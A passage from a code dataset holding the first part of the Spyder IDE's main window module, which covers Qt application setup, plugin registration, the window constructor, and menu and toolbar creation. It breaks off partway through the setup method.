source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
mainwindow.py
|
# -*- coding: utf-8 -*-
#
# Copyright © Spyder Project Contributors
# Licensed under the terms of the MIT License
# (see spyder/__init__.py for details)
"""
Spyder, the Scientific Python Development Environment
=====================================================
Developped and maintained by the Spyder Project
Contributors
Copyright © Spyder Project Contributors
Licensed under the terms of the MIT License
(see spyder/__init__.py for details)
"""
# =============================================================================
# Stdlib imports
# =============================================================================
from __future__ import print_function
from collections import OrderedDict
from enum import Enum
import errno
import gc
import logging
import os
import os.path as osp
import re
import shutil
import signal
import socket
import glob
import subprocess
import sys
import threading
import traceback
import importlib
logger = logging.getLogger(__name__)
#==============================================================================
# Keeping a reference to the original sys.exit before patching it
#==============================================================================
ORIGINAL_SYS_EXIT = sys.exit
#==============================================================================
# Check requirements
#==============================================================================
from spyder import requirements
requirements.check_path()
requirements.check_qt()
requirements.check_spyder_kernels()
#==============================================================================
# Windows only: support for hiding console window when started with python.exe
#==============================================================================
set_attached_console_visible = None
is_attached_console_visible = None
set_windows_appusermodelid = None
if os.name == 'nt':
from spyder.utils.windows import (set_attached_console_visible,
is_attached_console_visible,
set_windows_appusermodelid)
#==============================================================================
# Qt imports
#==============================================================================
from qtpy import API, PYQT5
from qtpy.compat import from_qvariant
from qtpy.QtCore import (QByteArray, QCoreApplication, QPoint, QSize, Qt,
QThread, QTimer, QUrl, Signal, Slot,
qInstallMessageHandler)
from qtpy.QtGui import QColor, QDesktopServices, QIcon, QKeySequence, QPixmap
from qtpy.QtWidgets import (QAction, QApplication, QDesktopWidget, QDockWidget,
QMainWindow, QMenu, QMessageBox, QShortcut,
QSplashScreen, QStyleFactory, QWidget, QCheckBox)
# Avoid a "Cannot mix incompatible Qt library" error on Windows platforms
from qtpy import QtSvg # analysis:ignore
# Avoid a bug in Qt: https://bugreports.qt.io/browse/QTBUG-46720
from qtpy import QtWebEngineWidgets # analysis:ignore
# To catch font errors in QtAwesome
from qtawesome.iconic_font import FontError
#==============================================================================
# Proper high DPI scaling is available in Qt >= 5.6.0. This attibute must
# be set before creating the application.
#==============================================================================
from spyder.config.manager import CONF
if hasattr(Qt, 'AA_EnableHighDpiScaling'):
QCoreApplication.setAttribute(Qt.AA_EnableHighDpiScaling,
CONF.get('main', 'high_dpi_scaling'))
#==============================================================================
# Get CLI options and set OpenGL backend. This attibute must
# be set before creating the application. See spyder-ide/spyder#11227
#==============================================================================
from spyder.app.utils import set_opengl_implementation
from spyder.app.cli_options import get_options
from spyder.config.base import running_under_pytest
# Get CLI options/args and make them available for future use.
# Ignore args if running tests or Spyder will try and fail to parse pytests's.
if running_under_pytest():
sys_argv = [sys.argv[0]]
CLI_OPTIONS, CLI_ARGS = get_options(sys_argv)
else:
CLI_OPTIONS, CLI_ARGS = get_options()
# **** Set OpenGL implementation to use ****
if CLI_OPTIONS.opengl_implementation:
option = CLI_OPTIONS.opengl_implementation
set_opengl_implementation(option)
else:
if CONF.get('main', 'opengl') != 'automatic':
option = CONF.get('main', 'opengl')
set_opengl_implementation(option)
#==============================================================================
# Create our QApplication instance here because it's needed to render the
# splash screen created below
#==============================================================================
from spyder.utils.qthelpers import qapplication
from spyder.config.base import get_image_path
MAIN_APP = qapplication()
if PYQT5:
APP_ICON = QIcon(get_image_path("spyder.svg"))
else:
APP_ICON = QIcon(get_image_path("spyder.png"))
MAIN_APP.setWindowIcon(APP_ICON)
#==============================================================================
# Create splash screen out of MainWindow to reduce perceived startup time.
#==============================================================================
from spyder.config.base import _, get_image_path, DEV
if not running_under_pytest():
SPLASH = QSplashScreen(QPixmap(get_image_path('splash.svg')))
SPLASH_FONT = SPLASH.font()
SPLASH_FONT.setPixelSize(10)
SPLASH.setFont(SPLASH_FONT)
SPLASH.show()
SPLASH.showMessage(_("Initializing..."),
int(Qt.AlignBottom | Qt.AlignCenter | Qt.AlignAbsolute),
QColor(Qt.white))
QApplication.processEvents()
else:
SPLASH = None
#==============================================================================
# Local utility imports
#==============================================================================
from spyder import (__version__, __project_url__, __forum_url__,
__trouble_url__, __website_url__, get_versions)
from spyder.app.utils import (get_python_doc_path, delete_lsp_log_files,
qt_message_handler, setup_logging)
from spyder.config.base import (get_conf_path, get_module_source_path, STDERR,
get_debug_level, MAC_APP_NAME, get_home_dir,
running_in_mac_app, get_module_path,
reset_config_files)
from spyder.config.main import OPEN_FILES_PORT
from spyder.config.utils import IMPORT_EXT, is_anaconda, is_gtk_desktop
from spyder import dependencies
from spyder.py3compat import (is_text_string, to_text_string,
PY3, qbytearray_to_str, configparser as cp)
from spyder.utils import encoding, programs
from spyder.utils import icon_manager as ima
from spyder.utils.programs import is_module_installed
from spyder.utils.misc import select_port, getcwd_or_home, get_python_executable
# TODO: Remove circular dependency between help and ipython console and remove
# this import. Help plugin should take care of it
from spyder.plugins.help.utils.sphinxify import CSS_PATH, DARK_CSS_PATH
from spyder.config.gui import is_dark_font_color
#==============================================================================
# Local gui imports
#==============================================================================
# NOTE: Move (if possible) import's of widgets and plugins exactly where they
# are needed in MainWindow to speed up perceived startup time (i.e. the time
# from clicking the Spyder icon to showing the splash screen).
try:
from spyder.utils.environ import WinUserEnvDialog
except ImportError:
WinUserEnvDialog = None # analysis:ignore
from spyder.utils.qthelpers import (create_action, add_actions, get_icon,
add_shortcut_to_tooltip,
create_module_bookmark_actions,
create_program_action, DialogManager,
create_python_script_action, file_uri,
MENU_SEPARATOR, set_menu_icons)
from spyder.otherplugins import get_spyderplugins_mods
from spyder.app import tour
from spyder.app.solver import find_external_plugins, solve_plugin_dependencies
# Spyder API Imports
from spyder.api.exceptions import SpyderAPIError
from spyder.api.plugins import Plugins, SpyderPluginV2, SpyderDockablePlugin
#==============================================================================
# Third-party library imports
#==============================================================================
import qdarkstyle
#==============================================================================
# Get the cwd before initializing WorkingDirectory, which sets it to the one
# used in the last session
#==============================================================================
CWD = getcwd_or_home()
#==============================================================================
# Install Qt messaage handler
#==============================================================================
qInstallMessageHandler(qt_message_handler)
#==============================================================================
# Main Window
#==============================================================================
class MainWindow(QMainWindow):
"""Spyder main window"""
DOCKOPTIONS = QMainWindow.AllowTabbedDocks|QMainWindow.AllowNestedDocks
CURSORBLINK_OSDEFAULT = QApplication.cursorFlashTime()
SPYDER_PATH = get_conf_path('path')
SPYDER_NOT_ACTIVE_PATH = get_conf_path('not_active_path')
BOOKMARKS = (
('Python2', "https://docs.python.org/2/index.html",
_("Python2 documentation")),
('Python3', "https://docs.python.org/3/index.html",
_("Python3 documentation")),
('numpy', "https://docs.scipy.org/doc/",
_("Numpy and Scipy documentation")),
('matplotlib', "https://matplotlib.org/contents.html",
_("Matplotlib documentation")),
('PyQt5',
"https://www.riverbankcomputing.com/static/Docs/PyQt5/",
_("PyQt5 Reference Guide")),
('PyQt5',
"https://www.riverbankcomputing.com/static/Docs/PyQt5/module_index.html",
_("PyQt5 API Reference")),
('winpython', "https://winpython.github.io/",
_("WinPython"))
)
DEFAULT_LAYOUTS = 4
# Signals
restore_scrollbar_position = Signal()
sig_setup_finished = Signal()
all_actions_defined = Signal()
# type: (OrderedDict, OrderedDict)
sig_pythonpath_changed = Signal(object, object)
sig_main_interpreter_changed = Signal()
sig_open_external_file = Signal(str)
sig_resized = Signal("QResizeEvent") # Related to interactive tour
sig_moved = Signal("QMoveEvent") # Related to interactive tour
sig_layout_setup_ready = Signal(object) # Related to default layouts
# --- Plugin handling methods
# ------------------------------------------------------------------------
def get_plugin(self, plugin_name):
"""
Return a plugin instance by providing the plugin class.
"""
for name, plugin in self._PLUGINS.items():
if plugin_name == name:
return plugin
else:
raise SpyderAPIError('Plugin "{}" not found!'.format(plugin_name))
def show_status_message(self, message, timeout):
"""
Show a status message in Spyder Main Window.
"""
status_bar = self.statusBar()
if status_bar.isVisible():
status_bar.showMessage(message, timeout)
def show_plugin_compatibility_message(self, message):
"""
Show a compatibility message.
"""
messageBox = QMessageBox(self)
messageBox.setWindowModality(Qt.NonModal)
messageBox.setAttribute(Qt.WA_DeleteOnClose)
messageBox.setWindowTitle(_('Compatibility Check'))
messageBox.setText(message)
messageBox.setStandardButtons(QMessageBox.Ok)
messageBox.show()
def add_plugin(self, plugin, external=False):
"""
Add plugin to plugins dictionary.
"""
self._PLUGINS[plugin.CONF_SECTION] = plugin
if external:
self._EXTERNAL_PLUGINS[plugin.CONF_SECTION] = plugin
else:
self._INTERNAL_PLUGINS[plugin.CONF_SECTION] = plugin
def register_plugin(self, plugin, external=False):
"""
Register a plugin in Spyder Main Window.
"""
self.set_splash(_("Loading {}...".format(plugin.get_name())))
logger.info("Loading {}...".format(plugin.NAME))
# Check plugin compatibility
is_compatible, message = plugin.check_compatibility()
plugin.is_compatible = is_compatible
plugin.get_description()
if not is_compatible:
self.show_compatibility_message(message)
return
# Signals
plugin.sig_exception_occurred.connect(self.handle_exception)
plugin.sig_free_memory_requested.connect(self.free_memory)
plugin.sig_quit_requested.connect(self.close)
plugin.sig_restart_requested.connect(self.restart)
plugin.sig_restart_requested.connect(self.restart)
plugin.sig_redirect_stdio_requested.connect(
self.redirect_internalshell_stdio)
plugin.sig_status_message_requested.connect(self.show_status_message)
if isinstance(plugin, SpyderDockablePlugin):
plugin.sig_focus_changed.connect(self.plugin_focus_changed)
plugin.sig_switch_to_plugin_requested.connect(
self.switch_to_plugin)
plugin.sig_update_ancestor_requested.connect(
lambda: plugin.set_ancestor(self))
# Register plugin
plugin._register()
plugin.register()
if isinstance(plugin, SpyderDockablePlugin):
# Add dockwidget
self.add_dockwidget(plugin)
# Update margins
margin = 0
if CONF.get('main', 'use_custom_margin'):
margin = CONF.get('main', 'custom_margin')
plugin.update_margins(margin)
self.add_plugin(plugin, external=external)
logger.info("Registering shortcuts for {}...".format(plugin.NAME))
for action_name, action in plugin.get_actions().items():
context = (getattr(action, 'shortcut_context', plugin.NAME)
or plugin.NAME)
if getattr(action, 'register_shortcut', True):
if isinstance(action_name, Enum):
action_name = action_name.value
self.register_shortcut(action, context, action_name)
if isinstance(plugin, SpyderDockablePlugin):
try:
context = '_'
name = 'switch to {}'.format(plugin.CONF_SECTION)
shortcut = CONF.get_shortcut(context, name,
plugin_name=plugin.CONF_SECTION)
except (cp.NoSectionError, cp.NoOptionError):
shortcut = None
sc = QShortcut(QKeySequence(), self,
lambda: self.switch_to_plugin(plugin))
sc.setContext(Qt.ApplicationShortcut)
plugin._shortcut = sc
self.register_shortcut(sc, context, name)
self.register_shortcut(plugin.toggle_view_action, context, name)
toolbars = plugin.get_registered_application_toolbars()
for __, toolbar in toolbars.items():
# TODO: To update this render call
toolbar._render()
self.toolbarslist.append(toolbar)
def unregister_plugin(self, plugin):
"""
Unregister a plugin from the Spyder Main Window.
"""
logger.info("Unloading {}...".format(plugin.NAME))
# Disconnect all slots
signals = [
plugin.sig_quit_requested,
plugin.sig_redirect_stdio,
plugin.sig_status_message_requested,
]
for signal in signals:
try:
signal.disconnect()
except TypeError:
pass
# Unregister shortcuts for actions
logger.info("Unregistering shortcuts for {}...".format(plugin.NAME))
for action_name, action in plugin.get_actions().items():
context = (getattr(action, 'shortcut_context', plugin.NAME)
or plugin.NAME)
self.unregister_shortcut(action, context, action_name)
# Unregister switch to shortcut
try:
context = '_'
name = 'switch to {}'.format(plugin.CONF_SECTION)
shortcut = CONF.get_shortcut(context, name,
plugin_name=plugin.CONF_SECTION)
except Exception:
pass
if shortcut is not None:
self.unregister_shortcut(
plugin._shortcut,
context,
"Switch to {}".format(plugin.CONF_SECTION),
)
# Remove dockwidget
logger.info("Removing {} dockwidget...".format(plugin.NAME))
self.remove_dockwidget(plugin)
plugin.unregister()
plugin._unregister()
def create_plugin_conf_widget(self, plugin):
"""
Create configuration dialog box page widget.
"""
config_dialog = self.prefs_dialog_instance
if plugin.CONF_WIDGET_CLASS is not None and config_dialog is not None:
conf_widget = plugin.CONF_WIDGET_CLASS(plugin, config_dialog)
conf_widget.initialize()
return conf_widget
def switch_to_plugin(self, plugin, force_focus=None):
"""
Switch to this plugin.
Notes
-----
This operation unmaximizes the current plugin (if any), raises
this plugin to view (if it's hidden) and gives it focus (if
possible).
"""
try:
# New API
if (self.last_plugin is not None
and self.last_plugin.get_widget().is_maximized
and self.last_plugin is not plugin):
self.maximize_dockwidget()
except AttributeError:
# Old API
if (self.last_plugin is not None and self.last_plugin._ismaximized
and self.last_plugin is not plugin):
self.maximize_dockwidget()
try:
# New API
if not plugin.toggle_view_action.isChecked():
plugin.toggle_view_action.setChecked(True)
plugin.get_widget().is_visible = False
except AttributeError:
# Old API
if not plugin._toggle_view_action.isChecked():
plugin._toggle_view_action.setChecked(True)
plugin._widget._is_visible = False
plugin.change_visibility(True, force_focus=force_focus)
def remove_dockwidget(self, plugin):
"""
Remove a plugin QDockWidget from the main window.
"""
self.removeDockWidget(plugin.dockwidget)
self.widgetlist.remove(plugin)
def tabify_plugin(self, plugin):
"""
Tabify the plugin using the list of possible TABIFY options.
Only do this if the dockwidget does not have more dockwidgets
in the same position and if the plugin is using the New API.
"""
def tabify_helper(plugin, next_to_plugins):
for next_to_plugin in next_to_plugins:
try:
self.tabify_plugins(next_to_plugin, plugin)
break
except SpyderAPIError as err:
logger.error(err)
# If TABIFY not defined use the [Console]
tabify = getattr(plugin, 'TABIFY', [self.get_plugin(Plugins.Console)])
if not isinstance(tabify, list):
next_to_plugins = [tabify]
else:
next_to_plugins = tabify
# Get the actual plugins from the names
next_to_plugins = [self.get_plugin(p) for p in next_to_plugins]
# First time plugin starts
if plugin.get_conf_option('first_time', True):
if (isinstance(plugin, SpyderDockablePlugin)
and plugin.NAME != Plugins.Console):
logger.info(
"Tabify {} dockwidget for the first time...".format(
plugin.NAME))
tabify_helper(plugin, next_to_plugins)
plugin.set_conf_option('enable', True)
plugin.set_conf_option('first_time', False)
else:
# This is needed to ensure new plugins are placed correctly
# without the need for a layout reset.
logger.info("Tabify {} dockwidget...".format(plugin.NAME))
# Check if plugin has no other dockwidgets in the same position
if not bool(self.tabifiedDockWidgets(plugin.dockwidget)):
tabify_helper(plugin, next_to_plugins)
def handle_exception(self, error_data):
"""
This method will call the handle exception method of the Console
plugin. It is provided as a signal on the Plugin API for convenience,
so that plugin do not need to explicitely call the Console plugin.
Parameters
----------
error_data: dict
The dictionary containing error data. The expected keys are:
>>> error_data= {
"text": str,
"is_traceback": bool,
"repo": str,
"title": str,
"label": str,
"steps": str,
}
Notes
-----
The `is_traceback` key indicates if `text` contains plain text or a
Python error traceback.
The `title` and `repo` keys indicate how the error data should
customize the report dialog and Github error submission.
The `label` and `steps` keys allow customizing the content of the
error dialog.
"""
if self.console:
self.console.handle_exception(error_data)
def __init__(self, options=None):
QMainWindow.__init__(self)
qapp = QApplication.instance()
if running_under_pytest():
self._proxy_style = None
else:
from spyder.utils.qthelpers import SpyderProxyStyle
# None is needed, see: https://bugreports.qt.io/browse/PYSIDE-922
self._proxy_style = SpyderProxyStyle(None)
if PYQT5:
# Enabling scaling for high dpi
qapp.setAttribute(Qt.AA_UseHighDpiPixmaps)
self.default_style = str(qapp.style().objectName())
self.dialog_manager = DialogManager()
self.init_workdir = options.working_directory
self.profile = options.profile
self.multithreaded = options.multithreaded
self.new_instance = options.new_instance
if options.project is not None:
self.open_project = osp.normpath(osp.join(CWD, options.project))
else:
self.open_project = None
self.window_title = options.window_title
logger.info("Start of MainWindow constructor")
def signal_handler(signum, frame=None):
"""Handler for signals."""
sys.stdout.write('Handling signal: %s\n' % signum)
sys.stdout.flush()
QApplication.quit()
if os.name == "nt":
try:
import win32api
win32api.SetConsoleCtrlHandler(signal_handler, True)
except ImportError:
pass
else:
signal.signal(signal.SIGTERM, signal_handler)
if not DEV:
# Make spyder quit when presing ctrl+C in the console
# In DEV Ctrl+C doesn't quit, because it helps to
# capture the traceback when spyder freezes
signal.signal(signal.SIGINT, signal_handler)
# Use a custom Qt stylesheet
if sys.platform == 'darwin':
spy_path = get_module_source_path('spyder')
img_path = osp.join(spy_path, 'images')
mac_style = open(osp.join(spy_path, 'app', 'mac_stylesheet.qss')).read()
mac_style = mac_style.replace('$IMAGE_PATH', img_path)
self.setStyleSheet(mac_style)
# Shortcut management data
self.shortcut_data = []
# Handle Spyder path
self.path = ()
self.not_active_path = ()
self.project_path = ()
# New API
self._APPLICATION_TOOLBARS = OrderedDict()
self._STATUS_WIDGETS = OrderedDict()
self._PLUGINS = OrderedDict()
self._EXTERNAL_PLUGINS = OrderedDict()
self._INTERNAL_PLUGINS = OrderedDict()
# Plugins
self.console = None
self.workingdirectory = None
self.editor = None
self.explorer = None
self.help = None
self.onlinehelp = None
self.projects = None
self.outlineexplorer = None
self.historylog = None
self.ipyconsole = None
self.variableexplorer = None
self.plots = None
self.findinfiles = None
self.thirdparty_plugins = []
# Tour # TODO: Should I consider it a plugin?? or?
self.tour = None
self.tours_available = None
# File switcher
self.switcher = None
# Check for updates Thread and Worker, refereces needed to prevent
# segfaulting
self.check_updates_action = None
self.thread_updates = None
self.worker_updates = None
self.give_updates_feedback = True
# Preferences
from spyder.preferences.general import MainConfigPage
from spyder.preferences.maininterpreter import MainInterpreterConfigPage
self.general_prefs = [MainConfigPage, MainInterpreterConfigPage]
self.prefs_index = None
self.prefs_dialog_size = None
self.prefs_dialog_instance = None
self._report_dlg = None
# Quick Layouts and Dialogs
from spyder.preferences.layoutdialog import (LayoutSaveDialog,
LayoutSettingsDialog)
self.dialog_layout_save = LayoutSaveDialog
self.dialog_layout_settings = LayoutSettingsDialog
# Actions
self.lock_interface_action = None
self.show_toolbars_action = None
self.close_dockwidget_action = None
self.undo_action = None
self.redo_action = None
self.copy_action = None
self.cut_action = None
self.paste_action = None
self.selectall_action = None
self.maximize_action = None
self.fullscreen_action = None
# Menu bars
self.file_menu = None
self.file_menu_actions = []
self.edit_menu = None
self.edit_menu_actions = []
self.search_menu = None
self.search_menu_actions = []
self.source_menu = None
self.source_menu_actions = []
self.run_menu = None
self.run_menu_actions = []
self.debug_menu = None
self.debug_menu_actions = []
self.consoles_menu = None
self.consoles_menu_actions = []
self.projects_menu = None
self.projects_menu_actions = []
self.tools_menu = None
self.tools_menu_actions = []
self.external_tools_menu = None # We must keep a reference to this,
# otherwise the external tools menu is lost after leaving setup method
self.external_tools_menu_actions = []
self.view_menu = None
self.plugins_menu = None
self.plugins_menu_actions = []
self.toolbars_menu = None
self.help_menu = None
self.help_menu_actions = []
# Status bar widgets
self.conda_status = None
self.mem_status = None
self.cpu_status = None
self.clock_status = None
# Toolbars
self.visible_toolbars = []
self.toolbarslist = []
self.main_toolbar = None
self.main_toolbar_actions = []
self.file_toolbar = None
self.file_toolbar_actions = []
self.edit_toolbar = None
self.edit_toolbar_actions = []
self.search_toolbar = None
self.search_toolbar_actions = []
self.source_toolbar = None
self.source_toolbar_actions = []
self.run_toolbar = None
self.run_toolbar_actions = []
self.debug_toolbar = None
self.debug_toolbar_actions = []
self.layout_toolbar = None
self.layout_toolbar_actions = []
self.menus = []
if running_under_pytest():
# Show errors in internal console when testing.
CONF.set('main', 'show_internal_errors', False)
# Set window title
self.set_window_title()
if set_windows_appusermodelid != None:
res = set_windows_appusermodelid()
logger.info("appusermodelid: %s", res)
# Setting QTimer if running in travis
test_travis = os.environ.get('TEST_CI_APP', None)
if test_travis is not None:
global MAIN_APP
timer_shutdown_time = 30000
self.timer_shutdown = QTimer(self)
self.timer_shutdown.timeout.connect(MAIN_APP.quit)
self.timer_shutdown.start(timer_shutdown_time)
# Showing splash screen
self.splash = SPLASH
if CONF.get('main', 'current_version', '') != __version__:
CONF.set('main', 'current_version', __version__)
# Execute here the actions to be performed only once after
# each update (there is nothing there for now, but it could
# be useful some day...)
# List of satellite widgets (registered in add_dockwidget):
self.widgetlist = []
# Flags used if closing() is called by the exit() shell command
self.already_closed = False
self.is_starting_up = True
self.is_setting_up = True
self.interface_locked = CONF.get('main', 'panes_locked')
self.floating_dockwidgets = []
self.window_size = None
self.window_position = None
self.state_before_maximizing = None
self.current_quick_layout = None
self.previous_layout_settings = None # TODO: related to quick layouts
self.last_plugin = None
self.fullscreen_flag = None # isFullscreen does not work as expected
# The following flag remember the maximized state even when
# the window is in fullscreen mode:
self.maximized_flag = None
# The following flag is used to restore window's geometry when
# toggling out of fullscreen mode in Windows.
self.saved_normal_geometry = None
# To keep track of the last focused widget
self.last_focused_widget = None
self.previous_focused_widget = None
# Keep track of dpi message
self.show_dpi_message = True
# Server to open external files on a single instance
# This is needed in order to handle socket creation problems.
# See spyder-ide/spyder#4132.
if os.name == 'nt':
try:
self.open_files_server = socket.socket(socket.AF_INET,
socket.SOCK_STREAM,
socket.IPPROTO_TCP)
except OSError as e:
self.open_files_server = None
QMessageBox.warning(None, "Spyder",
_("An error occurred while creating a socket needed "
"by Spyder. Please, try to run as an Administrator "
"from cmd.exe the following command and then "
"restart your computer: <br><br><span "
"style=\'color: #555555\'><b>netsh winsock reset"
"</b></span><br>"))
else:
self.open_files_server = socket.socket(socket.AF_INET,
socket.SOCK_STREAM,
socket.IPPROTO_TCP)
# Apply preferences
self.apply_settings()
# To set all dockwidgets tabs to be on top (in case we want to do it
# in the future)
# self.setTabPosition(Qt.AllDockWidgetAreas, QTabWidget.North)
logger.info("End of MainWindow constructor")
#---- Window setup
def create_toolbar(self, title, object_name, iconsize=24):
"""Create and return toolbar with *title* and *object_name*"""
toolbar = self.addToolBar(title)
toolbar.setObjectName(object_name)
toolbar.setIconSize(QSize(iconsize, iconsize))
self.toolbarslist.append(toolbar)
return toolbar
def _update_shortcuts_in_panes_menu(self, show=True):
"""
Display the shortcut for the "Switch to plugin..." on the toggle view
action of the plugins displayed in the Help/Panes menu.
Notes
-----
SpyderDockablePlugins provide two actions that function as a single
action. The `Switch to Plugin...` action has an assignable shortcut
via the shortcut preferences. The `Plugin toggle View` in the `View`
application menu, uses a custom `Toggle view action` that displays the
shortcut assigned to the `Switch to Plugin...` action, but is not
triggered by that shortcut.
"""
for plugin_id, plugin in self._PLUGINS.items():
if isinstance(plugin, SpyderDockablePlugin):
try:
# New API
action = plugin.toggle_view_action
except AttributeError:
# Old API
action = plugin._toggle_view_action
if show:
section = plugin.CONF_SECTION
try:
context = '_'
name = 'switch to {}'.format(section)
shortcut = CONF.get_shortcut(
context, name, plugin_name=section)
except (cp.NoSectionError, cp.NoOptionError):
shortcut = QKeySequence()
else:
shortcut = QKeySequence()
action.setShortcut(shortcut)
def setup(self):
"""Setup main window"""
logger.info("*** Start of MainWindow setup ***")
logger.info("Creating toolbars...")
# File menu/toolbar
self.file_menu = self.menuBar().addMenu(_("&File"))
self.file_toolbar = self.create_toolbar(_("File toolbar"),
"file_toolbar")
# Edit menu/toolbar
self.edit_menu = self.menuBar().addMenu(_("&Edit"))
self.edit_toolbar = self.create_toolbar(_("Edit toolbar"),
"edit_toolbar")
# Search menu/toolbar
self.search_menu = self.menuBar().addMenu(_("&Search"))
self.search_toolbar = self.create_toolbar(_("Search toolbar"),
"search_toolbar")
# Source menu/toolbar
self.source_menu = self.menuBar().addMenu(_("Sour&ce"))
self.source_toolbar = self.create_toolbar(_("Source toolbar"),
"source_toolbar")
# Run menu/toolbar
self.run_menu = self.menuBar().addMenu(_("&Run"))
self.run_toolbar = self.create_toolbar(_("Run toolbar"),
"run_toolbar")
# Debug menu/toolbar
self.debug_menu = self.menuBar().addMenu(_("&Debug"))
self.debug_toolbar = self.create_toolbar(_("Debug toolbar"),
"debug_toolbar")
# Consoles menu/toolbar
self.consoles_menu = self.menuBar().addMenu(_("C&onsoles"))
self.consoles_menu.aboutToShow.connect(
self.update_execution_state_kernel)
# Projects menu
self.projects_menu = self.menuBar().addMenu(_("&Projects"))
self.projects_menu.aboutToShow.connect(self.valid_project)
# Tools menu
self.tools_menu = self.menuBar().addMenu(_("&Tools"))
# View menu
self.view_menu = self.menuBar().addMenu(_("&View"))
self.view_menu.aboutToShow.connect(
lambda: self._update_shortcuts_in_panes_menu(True))
self.view_menu.aboutToHide.connect(
lambda: self._update_shortcuts_in_panes_menu(False))
# Help menu
self.help_menu = self.menuBar().addMenu(_("&Help"))
# Status bar
status = self.statusBar()
status.setObjectName("StatusBar")
status.showMessage(_("Welcome to Spyder!"), 5000)
logger.info("Updating PYTHONPATH")
path_dict = self.get_spyder_pythonpath_dict()
self.update_python_path(path_dict)
logger.info("Applying theme configuration...")
ui_theme = CONF.get('appearance', 'ui_theme')
color_scheme = CONF.get('appearance', 'selected')
if ui_theme == 'dark':
if not running_under_pytest():
# Set style proxy to fix combobox popup on mac and qdark
qapp = QApplication.instance()
qapp.setStyle(self._proxy_style)
dark_qss = qdarkstyle.load_stylesheet_from_environment()
self.setStyleSheet(dark_qss)
self.statusBar().setStyleSheet(dark_qss)
css_path = DARK_CSS_PATH
elif ui_theme == 'automatic':
if not is_dark_font_color(color_scheme):
if not running_under_pytest():
# Set style proxy to fix combobox popup on mac and qdark
qapp = QApplication.instance()
qapp.setStyle(self._proxy_style)
dark_qss = qdarkstyle.load_stylesheet_from_environment()
self.setStyleSheet(dark_qss)
self.statusBar().setStyleSheet(dark_qss)
css_path = DARK_CSS_PATH
else:
css_path = CSS_PATH
else:
css_path = CSS_PATH
# Shortcuts plugin
from spyder.plugins.shortcuts.plugin import Shortcuts
self.shortcuts = Shortcuts(self, configuration=CONF)
self.register_plugin(self.shortcuts)
logger.info("Creating core actions...")
self.close_dockwidget_action = create_action(
self, icon=ima.icon('close_pane'),
text=_("Close current pane"),
triggered=self.close_current_dockwidget,
context=Qt.ApplicationShortcut
)
self.register_shortcut(self.close_dockwidget_action, "_",
"Close pane")
self.lock_interface_action = create_action(
self,
(_("Unlock panes and toolbars") if self.interface_locked else
_("Lock panes and toolbars")),
icon=ima.icon('lock' if self.interface_locked else 'lock_open'),
triggered=lambda checked:
self.toggle_lock(not self.interface_locked),
context=Qt.ApplicationShortcut)
self.register_shortcut(self.lock_interface_action, "_",
"Lock unlock panes")
# custom layouts shortcuts
self.toggle_next_layout_action = create_action(self,
_("Use next layout"),
triggered=self.toggle_next_layout,
context=Qt.ApplicationShortcut)
self.toggle_previous_layout_action = create_action(self,
_("Use previous layout"),
triggered=self.toggle_previous_layout,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.toggle_next_layout_action, "_",
"Use next layout")
self.register_shortcut(self.toggle_previous_layout_action, "_",
"Use previous layout")
# Switcher shortcuts
self.file_switcher_action = create_action(
self,
_('File switcher...'),
icon=ima.icon('filelist'),
tip=_('Fast switch between files'),
triggered=self.open_switcher,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.file_switcher_action, context="_",
name="File switcher")
self.symbol_finder_action = create_action(
self, _('Symbol finder...'),
icon=ima.icon('symbol_find'),
tip=_('Fast symbol search in file'),
triggered=self.open_symbolfinder,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.symbol_finder_action, context="_",
name="symbol finder", add_shortcut_to_tip=True)
self.file_toolbar_actions = [self.file_switcher_action,
self.symbol_finder_action]
def create_edit_action(text, tr_text, icon):
textseq = text.split(' ')
method_name = textseq[0].lower()+"".join(textseq[1:])
action = create_action(self, tr_text,
icon=icon,
triggered=self.global_callback,
data=method_name,
context=Qt.WidgetShortcut)
self.register_shortcut(action, "Editor", text)
return action
self.undo_action = create_edit_action('Undo', _('Undo'),
ima.icon('undo'))
self.redo_action = create_edit_action('Redo', _('Redo'),
ima.icon('redo'))
self.copy_action = create_edit_action('Copy', _('Copy'),
ima.icon('editcopy'))
self.cut_action = create_edit_action('Cut', _('Cut'),
ima.icon('editcut'))
self.paste_action = create_edit_action('Paste', _('Paste'),
ima.icon('editpaste'))
self.selectall_action = create_edit_action("Select All",
_("Select All"),
ima.icon('selectall'))
self.edit_menu_actions = [self.undo_action, self.redo_action,
None, self.cut_action, self.copy_action,
self.paste_action, self.selectall_action]
logger.info("Creating Tools menu...")
# Tools + External Tools
prefs_action = create_action(self, _("Pre&ferences"),
icon=ima.icon('configure'),
triggered=self.show_preferences,
context=Qt.ApplicationShortcut)
self.register_shortcut(prefs_action, "_", "Preferences",
add_shortcut_to_tip=True)
spyder_path_action = create_action(self,
_("PYTHONPATH manager"),
None, icon=ima.icon('pythonpath'),
triggered=self.show_path_manager,
tip=_("Python Path Manager"),
menurole=QAction.ApplicationSpecificRole)
reset_spyder_action = create_action(
self, _("Reset Spyder to factory defaults"),
triggered=self.reset_spyder)
self.tools_menu_actions = [prefs_action, spyder_path_action]
if WinUserEnvDialog is not None:
winenv_action = create_action(self,
_("Current user environment variables..."),
icon='win_env.png',
tip=_("Show and edit current user environment "
"variables in Windows registry "
"(i.e. for all sessions)"),
triggered=self.win_env)
self.tools_menu_actions.append(winenv_action)
from spyder.plugins.completion.kite.utils.install import (
check_if_kite_installed)
is_kite_installed, kite_path = check_if_kite_installed()
if not is_kite_installed:
install_kite_action = create_action(
self, _("Install Kite completion engine"),
icon=get_icon('kite', adjust_for_interface=True),
triggered=self.show_kite_installation)
self.tools_menu_actions.append(install_kite_action)
self.tools_menu_actions += [MENU_SEPARATOR, reset_spyder_action]
if get_debug_level() >= 3:
self.menu_lsp_logs = QMenu(_("LSP logs"))
self.menu_lsp_logs.aboutToShow.connect(self.update_lsp_logs)
self.tools_menu_actions += [self.menu_lsp_logs]
# External Tools submenu
self.external_tools_menu = QMenu(_("External Tools"))
self.external_tools_menu_actions = []
# WinPython control panel
self.wp_action = create_action(self, _("WinPython control panel"),
icon=get_icon('winpython.svg'),
triggered=lambda:
programs.run_python_script('winpython', 'controlpanel'))
if os.name == 'nt' and is_module_installed('winpython'):
self.external_tools_menu_actions.append(self.wp_action)
# Qt-related tools
additact = []
for name in ("designer-qt4", "designer"):
qtdact = create_program_action(self, _("Qt Designer"), name)
if qtdact:
break
